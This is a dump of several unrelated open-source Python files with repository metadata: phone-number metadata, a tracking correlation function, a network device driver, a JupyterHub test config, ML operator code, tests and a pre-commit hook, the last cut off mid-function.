mobile=PhoneNumberDesc(national_number_pattern='(?:5\\d{5}|8(?:1(?:0(?:000|[3-9]\\d\\d)|(?:1(?:0[236]|1\\d)|(?:2[0-59]|[3-79]\\d)\\d)\\d)|2(?:0(?:000|(?:19|[2-7]\\d)\\d)|(?:(?:[124-6]\\d|3[5-9])\\d|7(?:[0-79]\\d|8[13-9])|8(?:[2-6]\\d|7[01]))\\d)|[349]\\d{4}))\\d\\d|5(?:(?:[02]\\d|5[0-478])\\d|1(?:[0-8]\\d|95)|6(?:4[0-4]|5[1-589]))\\d{3}', example_number='51234567', possible_length=(7, 8)),
toll_free=PhoneNumberDesc(national_number_pattern='800(?:(?:0\\d\\d|1)\\d|[2-9])\\d{3}', example_number='80012345', possible_length=(7, 8, 10)),
premium_rate=PhoneNumberDesc(national_number_pattern='(?:40\\d\\d|900)\\d{4}', example_number='9001234', possible_length=(7, 8)),
personal_number=PhoneNumberDesc(national_number_pattern='70[0-2]\\d{5}', example_number='70012345', possible_length=(8,)),
no_international_dialling=PhoneNumberDesc(national_number_pattern='800[2-9]\\d{3}', possible_length=(7,)),
number_format=[NumberFormat(pattern='(\\d{3})(\\d{4})', format='\\1 \\2', leading_digits_pattern=['[369]|4[3-8]|5(?:[0-2]|5[0-478]|6[45])|7[1-9]|88', '[369]|4[3-8]|5(?:[02]|1(?:[0-8]|95)|5[0-478]|6(?:4[0-4]|5[1-589]))|7[1-9]|88']),
NumberFormat(pattern='(\\d{4})(\\d{3,4})', format='\\1 \\2', leading_digits_pattern=['[45]|8(?:00|[1-49])', '[45]|8(?:00[1-9]|[1-49])']),
NumberFormat(pattern='(\\d{2})(\\d{2})(\\d{4})', format='\\1 \\2 \\3', leading_digits_pattern=['7']),
NumberFormat(pattern='(\\d{4})(\\d{3})(\\d{3})', format='\\1 \\2 \\3', leading_digits_pattern=['8'])],
mobile_number_portable_region=True)
|
ff1ba5582b1fc7212dc7a593b2e343ba80fa76b7
|
4caa087dcb95a6a7dbe8cc49fde383e9f2aa4426
|
/mmtrack/core/track/correlation.py
|
9441392597e9ffbe4cbcc011954b54eb428ff1a9
|
[
"Apache-2.0"
] |
permissive
|
open-mmlab/mmtracking
|
1e55c69cc1a264b3c9546c19332a38e9621430ed
|
e79491ec8f0b8c86fda947fbaaa824c66ab2a991
|
refs/heads/master
| 2023-09-01T15:41:04.322684
| 2023-04-25T13:25:18
| 2023-04-25T13:25:18
| 291,213,368
| 3,263
| 604
|
Apache-2.0
| 2023-08-26T04:05:00
| 2020-08-29T06:16:56
|
Python
|
UTF-8
|
Python
| false
| false
| 772
|
py
|
correlation.py
|
# Copyright (c) OpenMMLab. All rights reserved.
import torch.nn.functional as F
def depthwise_correlation(x, kernel):
"""Depthwise cross correlation.
This function is proposed in
`SiamRPN++ <https://arxiv.org/abs/1812.11703>`_.
Args:
x (Tensor): of shape (N, C, H_x, W_x).
kernel (Tensor): of shape (N, C, H_k, W_k).
Returns:
Tensor: of shape (N, C, H_o, W_o). H_o = H_x - H_k + 1. So does W_o.
"""
batch = kernel.size(0)
channel = kernel.size(1)
x = x.view(1, batch * channel, x.size(2), x.size(3))
kernel = kernel.view(batch * channel, 1, kernel.size(2), kernel.size(3))
out = F.conv2d(x, kernel, groups=batch * channel)
out = out.view(batch, channel, out.size(2), out.size(3))
return out
|
d2134b17eef6b79c8ef1b87e363b85963ccee478
|
30158cbe4ef57ec85df07da8e8f8085a5001996c
|
/frame_2D_alg/alternative versions/compare_draft.py
|
4a76b98625eb08569d06248cc9ed1fbe2c1203e7
|
[
"CC-BY-4.0",
"MIT"
] |
permissive
|
boris-kz/CogAlg
|
951c00e202db8537d106b9794b5309f22f3d25b9
|
a56a369524c9435bfb20225b71e87b6b28c9d1e3
|
refs/heads/master
| 2023-09-04T04:07:52.028903
| 2023-09-04T00:58:53
| 2023-09-04T00:58:53
| 90,488,789
| 110
| 54
|
MIT
| 2023-05-04T11:27:04
| 2017-05-06T20:17:18
|
Python
|
UTF-8
|
Python
| false
| false
| 5,140
|
py
|
compare_draft.py
|
import numpy as np
from cmath import phase
from math import hypot
# flags:
f_angle = 0b00000001
f_rng_incr = 0b00000010
# ************ FUNCTIONS ************************************************************************************************
# -compare_i()
# -construct_input_array()
# -convolve()
# -calc_g_fold_dert()
# -accumulated_d_()
# -calc_angle()
# ***********************************************************************************************************************
'''
Kernel-based version of:
Comparison of input param between derts at range=rng, summing derivatives from shorter + current range comps per pixel
Input is pixel brightness p or gradient g in dert[0] or angle a in dert[1]: g_dert = g, (dy, dx); ga_dert = g, a, (dy, dx)
if fa: compute and compare angle from dy, dx in dert[-1], only for g_dert in 2nd intra_comp of intra_blob
else: compare input param in dert[fia]: p|g in derts[cyc][0] or angle a in dert[1]
flag ga: i_dert = derts[cyc][fga], both fga and fia are set for current intra_blob forks and potentially recycled
flag ia: i = i_dert[fia]: selects dert[1] for incremental-range comp angle only
'''
def compare(P_, _dert___, i__, bounds, indices, flags): # comparison of input param between derts at range = rng
# _dert___ in blob ( dert__ in P_ line ( dert_ in P
rng = _dert___.maxlen
fa = flags & f_angle
fga = fa and (flags & -f_rng_incr) # why comp_g only?
fia = fa and (flags & f_rng_incr) # why fa, it can be for gradient of angle as well as for angle of angle?
cyc = -rng - 1 + fia
derts__, i_ = construct_input_array(P_, bounds, flags, cyc, fa, fga, fia) # construct input array with predetermined shape
if not flags: # hypot_g, returns current line derts__
return derts__, i_
_dert___.appendleft(derts__)
if len(_dert___) == 0: # no i__:
return [], i_ # return empty _derts__
if i__.shape[0] <= rng * 2: # incomplete _dert___:
return [], np.concatenate((i__, i_), axis=0) # return empty _derts__
i__ = np.concatenate((i__[1:], i_), axis=0) # discard top line, append last line i__
d_ = convolve(i__, kernels[rng], indices, rng) # convolve i__ with kernels
if flags & f_rng_incr: # accumulate with
d_ += accumulated_d_(_dert___[0]) # derts on rng-higher line
_derts__ = calc_g_fold_dert(_dert___.pop(), d_, indices, bounds, flags)
return _derts__ , i__
# ---------- compare_i() end --------------------------------------------------------------------------------------------
def construct_input_array(P_, bounds, flags, cyc, fa, fga, fia): # unfold P_
if flags: # not hypot_g()
start, end = bounds
calc_a = fa and not fia
derts__ = []
i_ = np.empty(shape=(1, end - start), dtype=int)
for P in P_:
if not calc_a:
derts_ = P.derts_
else: # compute angles
derts_ = [calc_angle(derts) for derts in P.derts_]
derts__.append((P.x0, derts_)) # unfold into derts__
index = P.x0 - start
i_[0, index: index + P.L] = [derts[cyc][fga][fia] for derts in derts_] # construct input array for comparison
else: # do hypot_g():
derts__ = [(P.x0, [[(p,), (int(hypot(dy, dx)), (dy, dx))] for p, g, dy, dx in P.dert_]) for P in P_] # unfold into derts__
i_ = None # no comparison
return derts__, i_
# ---------- construct_input_array() end --------------------------------------------------------------------------------
def convolve(a, k, indices, rng): # apply kernel, return array of dx, dy
# d_[0, :]: array of dy
# d_[1, :]: array of dx
d_ = np.empty((2, a.shape[1]))
d_[:, indices] = [(a[:, i-rng:i+rng+1] * k).sum(axis=(1, 2)) for i in indices]
return d_
# ---------- convolve() end ---------------------------------------------------------------------------------------------
def calc_g_fold_dert(derts__, d_, indices, bounds, flags): # compute g using array of dx, dy. fold dert
x0, xn = bounds
g_ = np.empty((d_.shape[1],))
g_[indices] = np.hypot(d_[0, indices], d_[1, indices])
new_derts__ = []
# append new dert into new_derts
# ...
return new_derts__
# ---------- calc_g_fold_dert() end -------------------------------------------------------------------------------------
def accumulated_d_(derts__):
return
# ---------- accumulated_d_() end ---------------------------------------------------------------------------------------
def calc_angle(derts): # compute a, return derts with angle
g = derts[-1][0]
dy, dx = derts[-1][-1]
a = (dx + dy * 1j) / g
a_radian = phase(a)
derts[-1][1].insert(a, a_radian) # a = dert[1], for i = dert[fia]
return derts[-1]
# ---------- calc_angle() end -----------------------------------------------------------------------------------------------
|
7bdb372ccabbefcaa712626293fd5ab3b1ea9fdd
|
8eb7e2224cd81cd21fd5b0c4dd54abe85ba07e49
|
/netmiko/ruijie/ruijie_os.py
|
f3a070da447adbf3b5f18efb7e0bf714c7105ec1
|
[
"MIT"
] |
permissive
|
ktbyers/netmiko
|
f8b980569fd863f0a7bfe28580366339c4bd31ec
|
2e56b40ec639da130471c59dd1f3c93983471e41
|
refs/heads/develop
| 2023-08-30T20:33:05.554926
| 2023-08-29T21:50:45
| 2023-08-29T21:50:45
| 27,283,062
| 3,397
| 1,594
|
MIT
| 2023-09-04T03:04:31
| 2014-11-28T21:42:52
|
Python
|
UTF-8
|
Python
| false
| false
| 1,298
|
py
|
ruijie_os.py
|
"""Ruijie RGOS Support"""
import time
from typing import Any
from netmiko.cisco_base_connection import CiscoBaseConnection
class RuijieOSBase(CiscoBaseConnection):
def session_preparation(self) -> None:
"""Prepare the session after the connection has been established."""
self._test_channel_read(pattern=r"[>#]")
self.set_base_prompt()
"""Ruijie OS requires enable mode to set terminal width"""
self.enable()
self.set_terminal_width(command="terminal width 256", pattern="terminal")
self.disable_paging(command="terminal length 0")
# Clear the read buffer
time.sleep(0.3 * self.global_delay_factor)
self.clear_buffer()
def save_config(
self, cmd: str = "write", confirm: bool = False, confirm_response: str = ""
) -> str:
"""Save config: write"""
return super().save_config(
cmd=cmd, confirm=confirm, confirm_response=confirm_response
)
class RuijieOSSSH(RuijieOSBase):
pass
class RuijieOSTelnet(RuijieOSBase):
def __init__(self, *args: Any, **kwargs: Any) -> None:
default_enter = kwargs.get("default_enter")
kwargs["default_enter"] = "\r\n" if default_enter is None else default_enter
super().__init__(*args, **kwargs)
|
a03bb78c33106c968ed93c8c729d922a02298b06
|
c5489e28e60aadcc6b378419cb9fb5000443ee3d
|
/ci/config_token.py
|
ac28a1317de255ffe99107f6c59ae3dba02bab63
|
[
"BSD-3-Clause"
] |
permissive
|
jupyterhub/jupyterhub-deploy-docker
|
1a43bee8f7a6c4671e6aa5201bb6594496e0f7f0
|
07b488325991230aab8427b6976a714da5f8a220
|
refs/heads/main
| 2023-09-02T00:28:24.998330
| 2023-08-28T06:51:33
| 2023-08-28T06:51:33
| 56,241,532
| 651
| 446
|
BSD-3-Clause
| 2023-08-28T06:51:35
| 2016-04-14T13:53:14
|
Python
|
UTF-8
|
Python
| false
| false
| 304
|
py
|
config_token.py
|
c.JupyterHub.load_roles = [ # noqa: F821
{
"name": "test-admin",
"scopes": ["admin:users", "admin:servers", "access:servers"],
"services": ["test"],
}
]
c.JupyterHub.services = [ # noqa: F821
{
"name": "test",
"api_token": "test-token-123",
}
]
|
2c255c98c1cc8fd159a06dd05ab13d1ffa448a31
|
568fa58296378fa129ab3349adf010daa44ed45b
|
/tests/common/test_op/ascend/apply_add_sign.py
|
c2fc833a08dc85e8f1b5d57dabc8de48548f49bf
|
[
"Apache-2.0",
"BSD-3-Clause",
"NCSA",
"X11-distribute-modifications-variant",
"Zlib",
"MIT",
"LicenseRef-scancode-unknown-license-reference",
"Unlicense",
"LLVM-exception",
"BSD-2-Clause"
] |
permissive
|
mindspore-ai/akg
|
37f471badc66de6a831f1f45ad84344f34d23ef2
|
99f33858d6972741748cbfc9ab0bf9600428fef7
|
refs/heads/master
| 2023-07-25T23:03:17.672665
| 2023-07-11T07:33:57
| 2023-07-11T07:33:57
| 274,077,856
| 319
| 36
|
Apache-2.0
| 2021-12-30T13:43:08
| 2020-06-22T08:09:05
|
Python
|
UTF-8
|
Python
| false
| false
| 3,597
|
py
|
apply_add_sign.py
|
# Copyright 2020-2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""operator dsl function: apply_add_sign"""
import akg
from akg import topi, tvm
import akg.utils as utils
from akg.utils.dsl_create import TensorUtils
from akg.utils.format_transform import get_shape
from akg.ops.math.ascend import Sign
def _apply_add_sign_compute(var, m, grad, lr, alpha, sign_decay, beta):
"""Compute apply_add_sign"""
m_out = _update_m(m, beta, grad)
sign_gm = topi.multiply(Sign(grad), Sign(m_out))
decay_gm = topi.multiply(sign_gm, sign_decay)
var_out = _update_var(decay_gm, alpha, lr, grad, var)
return var_out, m_out
def _update_m(m, beta, grad):
"""Update m_out = m * beta + grad * (1 - beta)"""
m_beta = topi.multiply(m, beta)
beta_neg = topi.multiply(beta, tvm.const(-1, beta.dtype))
beta_1 = topi.add(beta_neg, tvm.const(1, beta_neg.dtype))
grad_beta_gs = topi.multiply(grad, beta_1)
m_out = topi.add(m_beta, grad_beta_gs)
return m_out
def _update_var(decay_gm, alpha, lr, grad, var):
"""Update var_out = var - lr * (alpha + decay_gm) * grad"""
decay_gm_alpha = topi.add(decay_gm, alpha)
res = topi.multiply(decay_gm_alpha, lr)
res = topi.multiply(res, grad)
res_neg = topi.multiply(res, tvm.const(-1, res.dtype))
var_out = topi.add(var, res_neg)
return var_out
@utils.check_input_type(*([tvm.tensor.Tensor] * 7), (str, type(None)))
def apply_add_sign(var, m, grad, lr, alpha, sign_decay, beta, target=utils.CCE):
"""
Update 'var' according to the AddSign update.
m_out = m * beta + grad * (1 - beta)
var_out = var - lr * (alpha + sign_decay * Sign(grad) *Sign(m)) * grad
Args:
var (tvm.tensor.Tensor): A tensor of type float16 or float32
m (tvm.tensor.Tensor): A tensor of type float16 or float32
grad (tvm.tensor.Tensor): A tensor of type float16 or float32
lr (tvm.tensor.Tensor): A scalar tensor of type float16 or float32
alpha (tvm.tensor.Tensor): A scalar tensor of type float16 or float32
sign_decay (tvm.tensor.Tensor): A scalar tensor of type float16 or float32
beta (tvm.tensor.Tensor): A scalar tensor of type float16 or float32
Returns:
tvm.tensor.Tensor, updated var.
tvm.tensor.Tensor, updated m.
"""
utils.ops_dtype_check(var.dtype, utils.DtypeForDavinci.ALL_FLOAT)
for i in (m, lr, alpha, sign_decay, beta, grad):
utils.elemwise_dtype_check(var.dtype, i.dtype)
for i in (m, grad):
utils.elemwise_shape_check(var.shape, i.shape)
for i in (lr, alpha, sign_decay, beta):
if tuple(get_shape(i)) != (1,):
raise RuntimeError("lr, alpha, sign_decay and beta only support scalar.")
out_var, out_m = _apply_add_sign_compute(var, m, grad, lr, alpha, sign_decay, beta)
out_var, binds_info = TensorUtils.inplace_set(var, out_var, "var_buf")
out_m, binds_info2 = TensorUtils.inplace_set(m, out_m, "m_buf")
binds_info.update(binds_info2)
attrs = {utils.BINDS: binds_info}
return out_var, out_m, attrs
|
d83f62132400895966b21b270b1509a6b63fcb92
|
e61e664d95af3b93150cda5b92695be6551d2a7c
|
/vega/algorithms/nas/modnas/registry/registry.py
|
bab93f464b099d8c302c99f7363da01bd2c5d68d
|
[
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0",
"BSD-3-Clause",
"MIT"
] |
permissive
|
huawei-noah/vega
|
44aaf8bb28b45f707ed6cd4e871ba70fc0c04846
|
12e37a1991eb6771a2999fe0a46ddda920c47948
|
refs/heads/master
| 2023-09-01T20:16:28.746745
| 2023-02-15T09:36:59
| 2023-02-15T09:36:59
| 273,667,533
| 850
| 184
|
NOASSERTION
| 2023-02-15T09:37:01
| 2020-06-20T08:20:06
|
Python
|
UTF-8
|
Python
| false
| false
| 2,158
|
py
|
registry.py
|
# -*- coding:utf-8 -*-
# Copyright (C) 2020. Huawei Technologies Co., Ltd. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Default registry."""
import logging
from typing import Any
logger = logging.getLogger('modnas.registry')
class Registry():
"""Registry class."""
def __init__(self, allow_replace: bool = False) -> None:
self.allow_replace = allow_replace
self._reg_class = {}
def get_full_path(self, reg_path: str, reg_id: str) -> str:
"""Return full registration path."""
return '{}.{}'.format(reg_path, reg_id)
def get_reg_name(self, reg_path: str, reg_id: str) -> str:
"""Return proper registration name."""
name = self.get_full_path(reg_path, reg_id)
return name.lower().replace('-', '').replace('_', '').replace(' ', '')
def register(self, regclass: Any, reg_path: str, reg_id: str) -> None:
"""Register a component class."""
reg_id = self.get_reg_name(reg_path, reg_id)
if reg_id in self._reg_class:
logger.warning('re-register id: {}'.format(reg_id))
if not self.allow_replace:
raise ValueError('Cannot re-register id: {}'.format(reg_id))
self._reg_class[reg_id] = regclass
logger.debug('registered: {}'.format(reg_id))
def get(self, reg_path: str, reg_id: str) -> Any:
"""Return registered class by name."""
reg_id = self.get_reg_name(reg_path, reg_id)
if reg_id not in self._reg_class:
raise ValueError('id \'{}\' not found in registry'.format(reg_id))
return self._reg_class[reg_id]
registry = Registry()
|
03acc80083655efcef67397e6555ee93c0bcbdc1
|
2337351b228818e41be3002bd38f68f77c2aa074
|
/sa/profiles/Raisecom/ROS/get_mac_address_table.py
|
a6fa36aa8121f97fb8bb0d8c369b02cfd5b52f90
|
[
"BSD-3-Clause"
] |
permissive
|
nocproject/noc
|
57d40c680a1499374463e472434f9595ed6d1374
|
6e6d71574e9b9d822bec572cc629a0ea73604a59
|
refs/heads/master
| 2023-08-31T01:11:33.544573
| 2023-08-30T17:31:11
| 2023-08-30T17:31:11
| 107,815,776
| 105
| 33
|
BSD-3-Clause
| 2023-07-31T07:57:45
| 2017-10-21T21:04:33
|
Python
|
UTF-8
|
Python
| false
| false
| 1,567
|
py
|
get_mac_address_table.py
|
# ---------------------------------------------------------------------
# Raisecom.ROS.get_mac_address_table
# ---------------------------------------------------------------------
# Copyright (C) 2007-2017 The NOC Project
# See LICENSE for details
# ---------------------------------------------------------------------
# Python modules
import re
# NOC modules
from noc.sa.profiles.Generic.get_mac_address_table import Script as BaseScript
from noc.sa.interfaces.igetmacaddresstable import IGetMACAddressTable
class Script(BaseScript):
name = "Raisecom.ROS.get_mac_address_table"
interface = IGetMACAddressTable
rx_line = re.compile(
r"^(?P<mac>[0-9a-f]{4}\.[0-9a-f]{4}\.[0-9a-f]{4})\s+"
r"(?P<interface>(?:P|PC|port|gigaethernet1/1/)?\d+)\s+"
r"(?P<vlan_id>\d+)\s*(?P<type>Hit|Static|dynamic)",
re.MULTILINE | re.IGNORECASE,
)
def execute_cli(self, interface=None, vlan=None, mac=None):
if not self.is_iscom2624g:
v = self.cli("show mac-address-table l2-address")
else:
v = self.cli("show mac-address all")
r = []
for match in self.rx_line.finditer(v):
r += [
{
"vlan_id": match.group("vlan_id"),
"mac": match.group("mac"),
"interfaces": [match.group("interface")],
"type": {"hit": "D", "dynamic": "D", "static": "S"}[
match.group("type").lower()
],
}
]
return r
|
4155f42d48b7e52987817f66d1a279d84164bd89
|
fae16a539b7c1b0525aab40ddaeee3e451fc9b74
|
/tests/integration/client/feedback/dataset/remote/test_filtered.py
|
e550e6d912810b9dc21aa7d1e7cd8adf0f639c72
|
[
"LicenseRef-scancode-free-unknown",
"Apache-2.0"
] |
permissive
|
argilla-io/argilla
|
a6b45f7f64e9db82f6d9a61771d758ffbb3dab4a
|
7c1b2368b444b7b7a281d37ad51bcb2d8e92acf5
|
refs/heads/develop
| 2023-09-04T03:58:05.914619
| 2023-09-01T15:58:31
| 2023-09-01T15:58:31
| 362,500,938
| 1,085
| 122
|
Apache-2.0
| 2023-09-14T15:31:07
| 2021-04-28T14:37:42
|
Python
|
UTF-8
|
Python
| false
| false
| 4,789
|
py
|
test_filtered.py
|
# Copyright 2021-present, the Recognai S.L. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import List, Union
import pytest
from argilla.client import api
from argilla.client.feedback.dataset.local import FeedbackDataset
from argilla.client.feedback.dataset.remote.filtered import FilteredRemoteFeedbackDataset, FilteredRemoteFeedbackRecords
from argilla.client.feedback.schemas.records import FeedbackRecord, RemoteFeedbackRecord
from argilla.client.sdk.users.models import UserRole
from argilla.client.sdk.v1.datasets.models import FeedbackResponseStatusFilter
from tests.factories import DatasetFactory, RecordFactory, TextFieldFactory, TextQuestionFactory, UserFactory
@pytest.mark.asyncio
class TestFilteredRemoteFeedbackDataset:
@pytest.mark.parametrize("role", [UserRole.owner, UserRole.admin])
@pytest.mark.parametrize(
"status",
[
FeedbackResponseStatusFilter.draft,
FeedbackResponseStatusFilter.missing,
FeedbackResponseStatusFilter.discarded,
FeedbackResponseStatusFilter.submitted,
[FeedbackResponseStatusFilter.discarded, FeedbackResponseStatusFilter.submitted],
],
)
async def test_filter_by(
self, role: UserRole, status: Union[FeedbackResponseStatusFilter, List[FeedbackResponseStatusFilter]]
) -> None:
dataset = await DatasetFactory.create()
await TextFieldFactory.create(dataset=dataset, required=True)
await TextQuestionFactory.create(dataset=dataset, required=True)
await RecordFactory.create_batch(dataset=dataset, size=10)
user = await UserFactory.create(role=role, workspaces=[dataset.workspace])
api.init(api_key=user.api_key)
remote_dataset = FeedbackDataset.from_argilla(id=dataset.id)
filtered_dataset = remote_dataset.filter_by(response_status=status)
assert isinstance(filtered_dataset, FilteredRemoteFeedbackDataset)
assert isinstance(filtered_dataset.records, FilteredRemoteFeedbackRecords)
assert all([isinstance(record, RemoteFeedbackRecord) for record in filtered_dataset.records])
@pytest.mark.parametrize("role", [UserRole.owner, UserRole.admin])
@pytest.mark.parametrize(
"status",
[
FeedbackResponseStatusFilter.draft,
FeedbackResponseStatusFilter.missing,
FeedbackResponseStatusFilter.discarded,
FeedbackResponseStatusFilter.submitted,
[FeedbackResponseStatusFilter.discarded, FeedbackResponseStatusFilter.submitted],
],
)
async def test_not_implemented_methods(
self, role: UserRole, status: Union[FeedbackResponseStatusFilter, List[FeedbackResponseStatusFilter]]
) -> None:
dataset = await DatasetFactory.create()
text_field = await TextFieldFactory.create(dataset=dataset, required=True)
await TextQuestionFactory.create(dataset=dataset, required=True)
await RecordFactory.create_batch(dataset=dataset, size=10)
user = await UserFactory.create(role=role, workspaces=[dataset.workspace])
api.init(api_key=user.api_key)
remote_dataset = FeedbackDataset.from_argilla(id=dataset.id)
filtered_dataset = remote_dataset.filter_by(response_status=status)
assert isinstance(filtered_dataset, FilteredRemoteFeedbackDataset)
with pytest.raises(NotImplementedError, match="`records.delete` does not work for filtered datasets."):
filtered_dataset.delete_records(remote_dataset.records[0])
with pytest.raises(NotImplementedError, match="`records.delete` does not work for filtered datasets."):
filtered_dataset.records.delete(remote_dataset.records[0])
with pytest.raises(NotImplementedError, match="`records.add` does not work for filtered datasets."):
filtered_dataset.add_records(FeedbackRecord(fields={text_field.name: "test"}))
with pytest.raises(NotImplementedError, match="`records.add` does not work for filtered datasets."):
filtered_dataset.records.add(FeedbackRecord(fields={text_field.name: "test"}))
with pytest.raises(NotImplementedError, match="`delete` does not work for filtered datasets."):
filtered_dataset.delete()
|
855295772a8310d88aabc5c8e126834db85abc90
|
6b4dbc04e8b2513634e8d25b9f8b69c82c07b6fe
|
/test/UdsTest.py
|
a49c458731bc1309f43f8cb2a7c8a26c2e023000
|
[
"MIT"
] |
permissive
|
pylessard/python-udsoncan
|
57c62b59a88907c6a988501c65efa14cfb8153a0
|
1b93cc3cd0e09a21d48881ba53aed257f841bb89
|
refs/heads/master
| 2023-08-29T21:49:55.403246
| 2023-06-24T15:46:46
| 2023-06-24T15:46:46
| 99,459,987
| 477
| 181
|
MIT
| 2023-06-30T15:29:30
| 2017-08-06T02:40:37
|
Python
|
UTF-8
|
Python
| false
| false
| 177
|
py
|
UdsTest.py
|
import unittest
import logging
import sys
class UdsTest(unittest.TestCase):
def __init__(self, *args, **kwargs):
unittest.TestCase.__init__(self, *args, **kwargs)
|
63c8a5a4990fa74b3630c8de997acb7e8ef56737
|
ab40571d5051ad53c0f205fa797ba36eac516d06
|
/language/xsp/data_preprocessing/nl_to_sql_example.py
|
c7e828bd70f3e0382c31e2a12928ed517c9a6dd2
|
[
"Apache-2.0",
"LicenseRef-scancode-generic-cla"
] |
permissive
|
google-research/language
|
e941b1a92ab46d40d8d03bb0c314905cb6902ce2
|
ac9447064195e06de48cc91ff642f7fffa28ffe8
|
refs/heads/master
| 2023-08-24T23:10:13.207294
| 2023-05-25T20:47:18
| 2023-05-25T22:29:27
| 153,201,352
| 1,567
| 371
|
Apache-2.0
| 2023-07-06T23:03:15
| 2018-10-16T00:58:14
|
Python
|
UTF-8
|
Python
| false
| false
| 4,052
|
py
|
nl_to_sql_example.py
|
# coding=utf-8
# Copyright 2018 The Google AI Language Team Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Standard format for an example mapping from NL to SQL."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from language.xsp.data_preprocessing.language_utils import get_wordpieces
from language.xsp.data_preprocessing.language_utils import Wordpiece
from language.xsp.data_preprocessing.schema_utils import DatabaseTable
from language.xsp.data_preprocessing.schema_utils import get_schema_entities
from language.xsp.data_preprocessing.schema_utils import process_tables
from language.xsp.data_preprocessing.sql_utils import SQLQuery
class NLToSQLInput(object):
"""Contains information about the input to a NL to SQL model."""
def __init__(self):
self.original_utterance = None
self.utterance_wordpieces = list()
self.tables = list()
def to_json(self):
"""Returns the JSON form of this class."""
return {
'utterance_wordpieces': [
wordpiece.to_json() for wordpiece in self.utterance_wordpieces
],
'tables': [table.to_json() for table in self.tables],
'original_utterance': self.original_utterance
}
def from_json(self, dictionary):
"""Loads the NLToSQLInput attributes from a dictionary."""
self.original_utterance = dictionary['original_utterance']
self.tables = [
DatabaseTable().from_json(table) for table in dictionary['tables']
]
self.utterance_wordpieces = [
Wordpiece().from_json(wordpiece)
for wordpiece in dictionary['utterance_wordpieces']
]
return self
class NLToSQLExample(object):
"""Contains both inputs and outputs for a NL to SQL example."""
def __init__(self):
self.model_input = NLToSQLInput()
self.gold_sql_query = SQLQuery()
def to_json(self):
return {
'model_input': self.model_input.to_json(),
'gold_sql_query': self.gold_sql_query.to_json()
}
def from_json(self, dictionary):
self.model_input = self.model_input.from_json(dictionary['model_input'])
self.gold_sql_query = self.gold_sql_query.from_json(
dictionary['gold_sql_query'])
return self
def gold_query_string(self):
"""Generates a query string from the decoder actions for an example."""
gold_query = list()
for action in self.gold_sql_query.actions:
if action.symbol:
gold_query.append(action.symbol)
elif action.entity_copy:
copy_action = action.entity_copy
if copy_action.copied_table:
gold_query.append(copy_action.copied_table.original_table_name)
else:
gold_query.append(copy_action.copied_column.original_column_name)
else:
gold_query.append(action.utterance_copy.wordpiece)
return ' '.join(gold_query)
def populate_utterance(example, utterance, schema, tokenizer):
"""Sets the model input for a NLToSQLExample."""
example.model_input.original_utterance = utterance
schema_entities = get_schema_entities(schema)
# Set the utterance wordpieces
try:
wordpieces, aligned_schema_entities = get_wordpieces(
example.model_input.original_utterance, tokenizer, schema_entities)
example.model_input.utterance_wordpieces.extend(wordpieces)
# Set the table information
example.model_input.tables.extend(
process_tables(schema, tokenizer, aligned_schema_entities))
except UnicodeDecodeError as e:
print(unicode(e))
return None
return example
|
e397d09629a99610697e3de6dbce9f401b2ccd7a
|
2f7dc0184e5b4c0c15973b498c589de2d049e277
|
/pre_commit_hooks/check_builtin_literals.py
|
d3054aa075569f89b84529ae6093888d247c4197
|
[
"MIT"
] |
permissive
|
pre-commit/pre-commit-hooks
|
178ab044f0b18893d69521f13fc6cf9a29a13a09
|
3a569ca95749f562ff8b742e3568a077caeb5eb7
|
refs/heads/main
| 2023-08-18T02:31:00.550553
| 2023-08-15T14:18:50
| 2023-08-15T14:18:50
| 17,714,713
| 4,311
| 831
|
MIT
| 2023-09-14T20:13:15
| 2014-03-13T15:21:46
|
Python
|
UTF-8
|
Python
| false
| false
| 2,920
|
py
|
check_builtin_literals.py
|
from __future__ import annotations
import argparse
import ast
from typing import NamedTuple
from typing import Sequence
BUILTIN_TYPES = {
'complex': '0j',
'dict': '{}',
'float': '0.0',
'int': '0',
'list': '[]',
'str': "''",
'tuple': '()',
}
class Call(NamedTuple):
name: str
line: int
column: int
class Visitor(ast.NodeVisitor):
def __init__(
self,
ignore: Sequence[str] | None = None,
allow_dict_kwargs: bool = True,
) -> None:
self.builtin_type_calls: list[Call] = []
self.ignore = set(ignore) if ignore else set()
self.allow_dict_kwargs = allow_dict_kwargs
def _check_dict_call(self, node: ast.Call) -> bool:
return self.allow_dict_kwargs and bool(node.keywords)
def visit_Call(self, node: ast.Call) -> None:
if not isinstance(node.func, ast.Name):
# Ignore functions that are object attributes (`foo.bar()`).
# Assume that if the user calls `builtins.list()`, they know what
# they're doing.
return
if node.func.id not in set(BUILTIN_TYPES).difference(self.ignore):
return
if node.func.id == 'dict' and self._check_dict_call(node):
return
elif node.args:
return
self.builtin_type_calls.append(
Call(node.func.id, node.lineno, node.col_offset),
)
def check_file(
filename: str,
ignore: Sequence[str] | None = None,
allow_dict_kwargs: bool = True,
) -> list[Call]:
with open(filename, 'rb') as f:
